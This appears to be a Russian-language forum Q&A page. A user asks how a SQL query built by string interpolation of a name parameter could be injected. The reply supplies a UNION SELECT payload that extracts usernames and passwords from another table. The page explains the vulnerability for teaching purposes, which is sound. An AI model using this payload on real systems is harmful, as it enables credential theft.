Question

Просто из любопытства:

Я знаю, что значения не должны передаваться в запросе из-за проблем с внедрением SQL.

У меня есть запрос, аналогичный приведенному ниже.Как это можно использовать в терминах SQL-инъекций?

select * from users u inner join departments d on u.id = d.user_id
where u.id = '#{name}'

Итак, сделанный запрос

 select * from users u inner join departments d on u.id = d.user_id
    where u.id = 'An'

Этот запрос является лишь примером, а не рабочим.

Laurenz Albe · Answer 1 · 04 октября 2018

Используйте следующее для name:

' UNION SELECT username, password /* more fields */ FROM secrettable WHERE '' = '

Проверка уязвимости внедрения SQL

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.